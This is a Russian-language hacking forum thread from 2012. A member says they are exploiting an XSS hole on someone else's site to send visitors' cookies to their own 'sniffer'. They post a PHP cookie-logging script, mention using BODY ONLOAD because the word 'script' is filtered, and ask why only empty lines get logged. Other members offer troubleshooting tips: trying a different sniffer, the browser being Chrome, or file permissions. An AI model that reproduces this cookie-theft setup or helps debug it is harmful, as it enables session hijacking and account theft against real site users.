Вопрос по XSS

Discussion in 'Уязвимости' started by -=4ekiSt=-, 28 Oct 2012.

  1. -=4ekiSt=-

    -=4ekiSt=- Member

    Joined:
    17 Nov 2011
    Messages:
    31
    Likes Received:
    11
    Reputations:
    3
    Здравствуйте.
    Есть сайт с XSS уязвимостью.
    Пытаюсь послать куки на снифер:
    PHP:
    <?php
    $cookie 
    $_GET['cookie'];
    $log fopen("cookie.txt""a");
    fwrite($log$cookie ."\n");
    fclose($log);
    ?>
    URL с XSS:
    На сайте фильтруется слово "script" поэтому использую BODY ONLOAD.
    Редирект срабатывает, но в файл cookie.txt записывается пустая строка.
    Подскажите что я делаю не так, почему не пишутся куки?
     
    #1 -=4ekiSt=-, 28 Oct 2012
    Last edited: 28 Oct 2012
    1 person likes this.
  2. Van[ya]

    Van[ya] New Member

    Joined:
    7 Oct 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Хм , уязвимость работать должна попробуй на другом снифере .
     
  3. WarT

    WarT New Member

    Joined:
    4 Mar 2011
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Может у тебя ХРОМ?
     
    1 person likes this.
  4. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    Права 777?
     
Loading...